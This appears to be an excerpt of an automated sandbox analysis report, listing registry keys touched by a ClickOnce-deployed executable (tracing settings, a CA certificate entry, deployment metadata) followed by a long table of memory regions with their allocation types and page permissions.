HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
{c989bb7a-8385-4715-98cf-a741a8edb823}!ApplicationTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!010000007104d90af00b0000580100000000000000000000f3bd47179b28db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ApplicationSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsFullTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsShellVisible
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PreviousBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd

Memdumps

heap
page read and write
2A175AA9000
heap
page read and write
5160000
trusted library allocation
page read and write
86871FE000
unkown
page readonly
3802279000
stack
page read and write
1B1D7000
heap
page read and write
DE0000
trusted library allocation
page read and write
2D80000
heap
page execute and read and write
44EF000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
7FF8490D6000
trusted library allocation
page read and write
2487B52A000
heap
page read and write
2A177C9F000
heap
page read and write
7FF848D63000
trusted library allocation
page execute and read and write
1390000
heap
page read and write
2EBF000
trusted library allocation
page read and write
2487B57D000
heap
page read and write
2487B55B000
heap
page read and write
2AEE000
stack
page read and write
44B0000
trusted library allocation
page execute and read and write
2487AD2D000
heap
page read and write
2487BD29000
heap
page read and write
246CF623000
trusted library allocation
page read and write
3CA1000
trusted library allocation
page read and write
2487BD39000
heap
page read and write
2487B532000
heap
page read and write
2487AD02000
heap
page read and write
DFA000
heap
page read and write
AD3000
unkown
page readonly
7FF848D8D000
trusted library allocation
page execute and read and write
2487AC5F000
heap
page read and write
2A174030000
heap
page read and write
2487B533000
heap
page read and write
BB0000
heap
page read and write
1B7B2000
heap
page read and write
2A171E84000
heap
page read and write
2487B54D000
heap
page read and write
1976000
trusted library allocation
page read and write
7CD000
stack
page read and write
BBECEFA000
stack
page read and write
2E20000
heap
page execute and read and write
246CA91A000
heap
page read and write
531000
stack
page read and write
2A30000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page read and write
7FF848E1C000
trusted library allocation
page execute and read and write
7FF848D8C000
trusted library allocation
page execute and read and write
2A177DAB000
heap
page read and write
7FF848D54000
trusted library allocation
page read and write
AC1000
unkown
page execute read
246CB501000
trusted library allocation
page read and write
2487BCE4000
heap
page read and write
2A171E44000
heap
page read and write
1966000
trusted library allocation
page read and write
2A171E3C000
heap
page read and write
2487AD2B000
heap
page read and write
532D000
stack
page read and write
2487B52E000
heap
page read and write
2487B53B000
heap
page read and write
2487B533000
heap
page read and write
7FF848E50000
trusted library allocation
page execute and read and write
2487B533000
heap
page read and write
2411000
trusted library allocation
page read and write
E30000
heap
page read and write
C5D000
trusted library allocation
page execute and read and write
D8D000
trusted library allocation
page execute and read and write
246CA770000
trusted library section
page read and write
2A100244000
trusted library allocation
page read and write
1390000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
2A177C98000
heap
page read and write
2487ACAB000
heap
page read and write
2487BCB2000
heap
page read and write
2A100628000
trusted library allocation
page read and write
8685FFE000
stack
page read and write
7FF848D33000
trusted library allocation
page execute and read and write
86E000
stack
page read and write
1180000
heap
page read and write
2487B579000
heap
page read and write
8686E7E000
stack
page read and write
7FF848EF0000
trusted library allocation
page read and write
2D6F000
stack
page read and write
2487AC3F000
heap
page read and write
2487AD2B000
heap
page read and write
12B6000
heap
page read and write
2A45000
trusted library allocation
page execute and read and write
DC0000
heap
page read and write
7FF848FE0000
trusted library allocation
page read and write
12D9E000
trusted library allocation
page read and write
246CF8F5000
heap
page read and write
7FF848E80000
trusted library allocation
page execute and read and write
7FF848E06000
trusted library allocation
page read and write
2A177D5B000
heap
page read and write
B00000
heap
page read and write
1C1F0000
heap
page execute and read and write
2A173770000
heap
page read and write
2487B52E000
heap
page read and write
2A175BE0000
heap
page read and write
7FF848EF0000
trusted library allocation
page read and write
ABE000
stack
page read and write
2A1101C4000
trusted library allocation
page read and write
DC884FC000
stack
page read and write
7FF848FD0000
trusted library allocation
page read and write
13D0000
heap
page read and write
246CF915000
heap
page read and write
2487ACC3000
heap
page read and write
2487B533000
heap
page read and write
2487BD02000
heap
page read and write
2487BCB8000
heap
page read and write
1B956000
stack
page read and write
1B52000
trusted library allocation
page read and write
AD1000
unkown
page read and write
7FF848F80000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
7FF848D74000
trusted library allocation
page read and write
2A1720B0000
heap
page read and write
2487BCB5000
heap
page read and write
2487B52A000
heap
page read and write
246CB0E0000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
2487BD36000
heap
page read and write
E01000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
2A171E46000
heap
page read and write
7FF848FD0000
trusted library allocation
page read and write
2487BD06000
heap
page read and write
2A177D9B000
heap
page read and write
2E30000
unkown
page readonly
246CF6F0000
trusted library allocation
page read and write
7FF848F25000
trusted library allocation
page read and write
DC879F9000
stack
page read and write
2A173850000
heap
page execute and read and write
2A175A9C000
heap
page read and write
7FF848DE6000
trusted library allocation
page read and write
C53000
trusted library allocation
page execute and read and write
246CF5F4000
trusted library allocation
page read and write
2487B55B000
heap
page read and write
246CA95A000
heap
page read and write
2487B533000
heap
page read and write
2A10051A000
trusted library allocation
page read and write
2487ACF7000
heap
page read and write
1B81E000
stack
page read and write
2A174688000
heap
page read and write
1140000
heap
page read and write
246CF8F3000
heap
page read and write
2CA1000
trusted library allocation
page read and write
DC87AFE000
unkown
page readonly
438E000
stack
page read and write
246CF700000
trusted library allocation
page read and write
11AE000
stack
page read and write
7FF848F90000
trusted library allocation
page read and write
2A175BEE000
heap
page read and write
C20000
trusted library section
page read and write
149E000
stack
page read and write
13FE5B02000
heap
page read and write
4500000
trusted library allocation
page execute and read and write
2487B510000
heap
page read and write
2487BD3C000
heap
page read and write
BD0000
heap
page read and write
319E000
stack
page read and write
5370000
heap
page read and write
1B853000
heap
page read and write
2487B535000
heap
page read and write
17C0000
heap
page read and write
2487B507000
heap
page read and write
4520000
heap
page read and write
2A32000
trusted library allocation
page read and write
13FE5B13000
heap
page read and write
2A10000
trusted library allocation
page read and write
7FF848D4A000
trusted library allocation
page read and write
BBEBFFE000
stack
page read and write
DC873FE000
unkown
page readonly
1BBA4000
heap
page read and write
1B6F0000
heap
page execute and read and write
E39000
heap
page read and write
2487B53B000
heap
page read and write
2A100268000
trusted library allocation
page read and write
2487ACBB000
heap
page read and write
5A3000
heap
page read and write
117F000
heap
page read and write
46CE000
stack
page read and write
7FF848F20000
trusted library allocation
page read and write
246CA0A1000
heap
page read and write
FBE000
stack
page read and write
246CF750000
remote allocation
page read and write
246CA09B000
heap
page read and write
DC874FE000
unkown
page readonly
7FF849030000
trusted library allocation
page read and write
1B7CB000
heap
page read and write
12C0000
heap
page read and write
2A177D92000
heap
page read and write
2487B56B000
heap
page read and write
1B0EE000
stack
page read and write
2487BD55000
heap
page read and write
2A10084A000
trusted library allocation
page read and write
7FF848D64000
trusted library allocation
page read and write
2A175ADC000
heap
page read and write
1130000
heap
page read and write
2487B402000
heap
page read and write
2487BCE0000
heap
page read and write
8686FFC000
stack
page read and write
139B000
trusted library allocation
page read and write
7FF848D63000
trusted library allocation
page read and write
2A174645000
heap
page read and write
2F21000
trusted library allocation
page read and write
13FE5B02000
heap
page read and write
890000
heap
page read and write
2487B500000
heap
page read and write
12DA0000
trusted library allocation
page read and write
1241E000
trusted library allocation
page read and write
2487B540000
heap
page read and write
246CF6E0000
trusted library allocation
page read and write
246CA0AB000
heap
page read and write
1B1C3000
heap
page read and write
246CA08B000
heap
page read and write
2A171DF0000
trusted library allocation
page read and write
7FF848EEF000
trusted library allocation
page read and write
DAB000
trusted library allocation
page execute and read and write
EEB000
heap
page read and write
2487B530000
heap
page read and write
246CF750000
remote allocation
page read and write
1BE92000
unkown
page readonly
2A42000
trusted library allocation
page read and write
2A1005A4000
trusted library allocation
page read and write
3D00000
trusted library allocation
page read and write
BBEC0FA000
stack
page read and write
7FF848E46000
trusted library allocation
page execute and read and write
12B0000
heap
page read and write
2487AD02000
heap
page read and write
246CA800000
heap
page read and write
7FF849170000
trusted library allocation
page read and write
2487BCC2000
heap
page read and write
2D91000
trusted library allocation
page read and write
246CF8BB000
heap
page read and write
246C9FD0000
heap
page read and write
10D0000
heap
page read and write
7FF848D60000
trusted library allocation
page read and write
7FF848F70000
trusted library allocation
page read and write
2EA0000
heap
page read and write
3EA0000
trusted library allocation
page read and write
DC87BFE000
stack
page read and write
2487B510000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
2A110001000
trusted library allocation
page read and write
5130000
trusted library allocation
page read and write
DC878FE000
unkown
page readonly
7FF848D84000
trusted library allocation
page read and write
1560000
heap
page read and write
2487BD3C000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
2A175750000
heap
page read and write
1BA1F000
stack
page read and write
2A171EFE000
heap
page read and write
2A175A5E000
heap
page read and write
2487B52A000
heap
page read and write
2487BD02000
heap
page read and write
1B66000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
2487B50E000
heap
page read and write
DD0000
trusted library allocation
page execute and read and write
2D4F000
trusted library allocation
page read and write
2BEE000
stack
page read and write
DA2000
trusted library allocation
page read and write
3117000
trusted library allocation
page read and write
4DAA000
stack
page read and write
7FF848F90000
trusted library allocation
page read and write
C10000
unkown
page readonly
7FF848FD0000
trusted library allocation
page read and write
ACB000
unkown
page readonly
2487BCC0000
heap
page read and write
3801A9D000
stack
page read and write
1564000
heap
page read and write
7FF848F60000
trusted library allocation
page read and write
7FF848FC9000
trusted library allocation
page read and write
44E0000
trusted library allocation
page read and write
50AC000
stack
page read and write
1BC4D000
stack
page read and write
1181000
heap
page read and write
5340000
trusted library allocation
page read and write
7FF848FC1000
trusted library allocation
page read and write
2487B52E000
heap
page read and write
7FF848EE3000
trusted library allocation
page read and write
1B9B0000
heap
page read and write
7FF848F64000
trusted library allocation
page read and write
2A20000
trusted library allocation
page read and write
246CAFB0000
trusted library section
page readonly
2A1003C1000
trusted library allocation
page read and write
2A175C12000
heap
page read and write
2487B510000
heap
page read and write
2487BCFD000
heap
page read and write
2A36000
trusted library allocation
page execute and read and write
177E000
stack
page read and write
246CA91A000
heap
page read and write
7FF848E16000
trusted library allocation
page read and write
1206000
heap
page read and write
86877F9000
stack
page read and write
2487ACF7000
heap
page read and write
1B91E000
stack
page read and write
13A0000
heap
page read and write
D7E000
stack
page read and write
86874FE000
unkown
page readonly
2487BCFF000
heap
page read and write
DF7000
heap
page read and write
7FF848D54000
trusted library allocation
page read and write
2487B57D000
heap
page read and write
246CF700000
trusted library allocation
page read and write
2A173860000
trusted library allocation
page read and write
1AE70000
trusted library allocation
page read and write
12EBD000
trusted library allocation
page read and write
9EC000
stack
page read and write
7FF8490A0000
trusted library allocation
page read and write
7FF8490D2000
trusted library allocation
page read and write
7FF848F05000
trusted library allocation
page read and write
246CA760000
trusted library allocation
page read and write
2A4B000
trusted library allocation
page execute and read and write
86867FB000
stack
page read and write
D78000
stack
page read and write
2487ACEF000
heap
page read and write
3F90000
trusted library allocation
page read and write
AC0000
unkown
page readonly
2A10073A000
trusted library allocation
page read and write
7FF848F13000
trusted library allocation
page read and write
197A000
trusted library allocation
page read and write
C6D000
unkown
page readonly
246CAE40000
trusted library allocation
page read and write
C12000
unkown
page readonly
2487BCDE000
heap
page read and write
118D000
heap
page read and write
7FF849180000
trusted library allocation
page execute and read and write
DC880FE000
unkown
page readonly
246CAFF0000
trusted library section
page readonly
592A000
stack
page read and write
1B4C000
trusted library allocation
page read and write
7FF848E1C000
trusted library allocation
page execute and read and write
2487B581000
heap
page read and write
2A1740E5000
heap
page read and write
1786000
trusted library allocation
page read and write
1370000
trusted library allocation
page read and write
2487B530000
heap
page read and write
2487B557000
heap
page read and write
750000
heap
page read and write
2A10001A000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page read and write
868737E000
stack
page read and write
2822000
trusted library allocation
page read and write
1B710000
heap
page read and write
1B83A000
heap
page read and write
246CF5F0000
trusted library allocation
page read and write
2487B530000
heap
page read and write
5140000
unkown
page readonly
3D0A000
trusted library allocation
page read and write
3112000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page execute and read and write
E5B000
heap
page read and write
51F2000
unkown
page readonly
2A17467D000
heap
page read and write
BD6000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
2487B553000
heap
page read and write
31A3000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
2A10053D000
trusted library allocation
page read and write
2487B585000
heap
page read and write
DC877FC000
stack
page read and write
246CF5B0000
trusted library allocation
page read and write
8686A7E000
stack
page read and write
7FF848EE5000
trusted library allocation
page read and write
2A171E00000
heap
page read and write
2A175C0C000
heap
page read and write
86872FE000
stack
page read and write
7FF849230000
trusted library allocation
page read and write
2AA0000
heap
page read and write
1290000
trusted library section
page read and write
2487BD65000
heap
page read and write
7FF848F90000
trusted library allocation
page read and write
7FF8491E0000
trusted library allocation
page read and write
2A10008D000
trusted library allocation
page read and write
7FF848F1E000
trusted library allocation
page read and write
7FF849210000
trusted library allocation
page execute and read and write
2487B530000
heap
page read and write
246CF854000
heap
page read and write
3801EFE000
stack
page read and write
2487B3C0000
remote allocation
page read and write
2A60000
trusted library allocation
page read and write
19B9000
trusted library allocation
page read and write
2487BCCC000
heap
page read and write
26B5000
trusted library allocation
page read and write
2487BD12000
heap
page read and write
8687EFE000
unkown
page readonly
7FF848F84000
trusted library allocation
page read and write
2A1101D0000
trusted library allocation
page read and write
1399000
trusted library allocation
page read and write
424F000
stack
page read and write
DC875FA000
stack
page read and write
2487B510000
heap
page read and write
C05000
heap
page read and write
7FF848F49000
trusted library allocation
page read and write
2487B585000
heap
page read and write
2A100757000
trusted library allocation
page read and write
246CF690000
trusted library allocation
page read and write
119B000
heap
page read and write
2487B532000
heap
page read and write
D90000
trusted library allocation
page read and write
12B5000
heap
page read and write
2487AC22000
heap
page read and write
3090000
heap
page read and write
2487BD1B000
heap
page read and write
2487BCB8000
heap
page read and write
396E000
stack
page read and write
2A171DD0000
trusted library allocation
page read and write
2A1736F0000
trusted library allocation
page read and write
13A6000
heap
page read and write
7FF848E10000
trusted library allocation
page execute and read and write
2A175A30000
heap
page read and write
7FF848FD5000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
246CF8F6000
heap
page read and write
7FF848F11000
trusted library allocation
page read and write
5154000
unkown
page readonly
2A174660000
heap
page read and write
14D0000
trusted library allocation
page read and write
7FF848D8D000
trusted library allocation
page execute and read and write
246CF911000
heap
page read and write
468D000
stack
page read and write
2A175A82000
heap
page read and write
7FF4A7670000
trusted library allocation
page execute and read and write
2A1D000
trusted library allocation
page execute and read and write
2487B529000
heap
page read and write
13FE582B000
heap
page read and write
DC872F9000
stack
page read and write
13FE5640000
heap
page read and write
1ADEF000
stack
page read and write
2487BCE4000
heap
page read and write
7FF848F10000
trusted library allocation
page read and write
2487B533000
heap
page read and write
2487BC00000
heap
page read and write
4FAC000
stack
page read and write
7FF849040000
trusted library allocation
page read and write
8B5000
heap
page read and write
DC8747E000
stack
page read and write
2A171ED1000
heap
page read and write
1B81B000
heap
page read and write
AC1000
unkown
page execute read
7FF8490F0000
trusted library allocation
page read and write
246CF861000
heap
page read and write
DA5000
trusted library allocation
page execute and read and write
246CF8C1000
heap
page read and write
2487BD1B000
heap
page read and write
246CF902000
heap
page read and write
7FF848F70000
trusted library allocation
page execute and read and write
1C12E000
stack
page read and write
2A1102C6000
trusted library allocation
page read and write
2FEF000
stack
page read and write
7FF849070000
trusted library allocation
page read and write
86869FE000
unkown
page readonly
8685A7B000
stack
page read and write
7FF848FE9000
trusted library allocation
page read and write
246CF800000
heap
page read and write
13FE5A02000
heap
page read and write
246CA0BA000
heap
page read and write
86878FE000
unkown
page readonly
12A0000
trusted library allocation
page read and write
2487B52F000
heap
page read and write
ACB000
unkown
page readonly
1566000
heap
page read and write
1BB6D000
heap
page read and write
2487B579000
heap
page read and write
2A177D62000
heap
page read and write
246CAFA0000
trusted library section
page readonly
7FF849100000
trusted library allocation
page read and write
246CAFD0000
trusted library section
page readonly
2487AD3A000
heap
page read and write
2400000
heap
page execute and read and write
4DDE000
stack
page read and write
7FF848F86000
trusted library allocation
page read and write
2A174650000
heap
page read and write
B05000
heap
page read and write
12D9C000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
1241C000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
2487AC9E000
heap
page read and write
BBECAFD000
stack
page read and write
7FF848D62000
trusted library allocation
page read and write
2A171C50000
heap
page read and write
2A100085000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
2487B529000
heap
page read and write
17D1000
trusted library allocation
page read and write
2487AC13000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
2487B533000
heap
page read and write
7FF848D5B000
trusted library allocation
page execute and read and write
7FF848E36000
trusted library allocation
page execute and read and write
2A175B7C000
heap
page read and write
2487BCC6000
heap
page read and write
7FF848D43000
trusted library allocation
page read and write
2487B52E000
heap
page read and write
51EB000
stack
page read and write
7FF8490C0000
trusted library allocation
page read and write
12EB1000
trusted library allocation
page read and write
F17000
heap
page read and write
C60000
unkown
page readonly
7FF848ED8000
trusted library allocation
page read and write
246CA900000
heap
page read and write
13FE5813000
unkown
page read and write
2487AC29000
heap
page read and write
24CF000
trusted library allocation
page read and write
7FF848E46000
trusted library allocation
page execute and read and write
2A174126000
heap
page read and write
46F0000
trusted library allocation
page read and write
246CF8E1000
heap
page read and write
7FF848FCE000
trusted library allocation
page read and write
1B7ED000
heap
page read and write
14BF000
stack
page read and write
7FF849113000
trusted library allocation
page read and write
7FF849140000
trusted library allocation
page read and write
56AB000
stack
page read and write
2487BC3C000
heap
page read and write
522E000
stack
page read and write
2487B532000
heap
page read and write
2A13000
trusted library allocation
page execute and read and write
B4E000
stack
page read and write
2A10007C000
trusted library allocation
page read and write
2487B50E000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
D80000
heap
page read and write
178C000
trusted library allocation
page read and write
1B98F000
stack
page read and write
246CF821000
heap
page read and write
7FF848D6D000
trusted library allocation
page execute and read and write
2EE0000
heap
page read and write
5E2000
heap
page read and write
8685EFE000
unkown
page readonly
5170000
trusted library allocation
page read and write
7FF8490D4000
trusted library allocation
page read and write
2A100240000
trusted library allocation
page read and write
DB0000
heap
page read and write
7FF848F56000
trusted library allocation
page read and write
7FF848D6D000
trusted library allocation
page execute and read and write
2A1720B5000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
7FF848F4C000
trusted library allocation
page read and write
2487B510000
heap
page read and write
2487BCB6000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
3F00000
unkown
page readonly
7FF848FE1000
trusted library allocation
page read and write
2487AD2C000
heap
page read and write
2487ACAF000
heap
page read and write
1159000
heap
page read and write
7FF848F57000
trusted library allocation
page read and write
460D000
stack
page read and write
44D0000
trusted library allocation
page read and write
7FF848F17000
trusted library allocation
page read and write
1B853000
heap
page execute and read and write
5BB0000
heap
page read and write
7FF848D53000
trusted library allocation
page execute and read and write
7FF849130000
trusted library allocation
page execute and read and write
2487BCB1000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
246CAB91000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page read and write
3D40000
trusted library allocation
page read and write
2A3A000
trusted library allocation
page execute and read and write
119F000
heap
page read and write
2487BCBB000
heap
page read and write
246CA041000
heap
page read and write
1110000
trusted library allocation
page read and write
23AE000
stack
page read and write
D96000
trusted library allocation
page execute and read and write
12D91000
trusted library allocation
page read and write
5360000
trusted library allocation
page execute and read and write
C61000
unkown
page execute read
DA0000
trusted library allocation
page read and write
2487BCE7000
heap
page read and write
7FF848E16000
trusted library allocation
page read and write
13A0000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
1B1B3000
heap
page read and write
86862FE000
unkown
page readonly
7FF848D80000
trusted library allocation
page read and write
1BB40000
heap
page read and write
8686BFE000
unkown
page readonly
1AEE0000
heap
page read and write
2A1101D3000
trusted library allocation
page read and write
7FF848F45000
trusted library allocation
page read and write
13FE5B00000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
2487B583000
heap
page read and write
7FF848E0C000
trusted library allocation
page execute and read and write
2487AD13000
heap
page read and write
7FF848D8B000
trusted library allocation
page execute and read and write
DC882FC000
stack
page read and write
7FF849020000
trusted library allocation
page read and write
1B680000
unkown
page readonly
17B5000
trusted library allocation
page read and write
1450000
heap
page read and write
2487AD19000
heap
page read and write
1B43D000
stack
page read and write
7FF848D7D000
trusted library allocation
page execute and read and write
DC885FE000
unkown
page readonly
46E0000
trusted library allocation
page read and write
1B7C4000
heap
page read and write
A20000
heap
page read and write
DE4000
stack
page read and write
246CF590000
trusted library allocation
page read and write
2EB1000
trusted library allocation
page read and write
19DF000
trusted library allocation
page read and write
7FF848F87000
trusted library allocation
page read and write
246CF817000
heap
page read and write
1B768000
stack
page read and write
2487BC7D000
heap
page read and write
2A173840000
trusted library section
page readonly
1B31D000
stack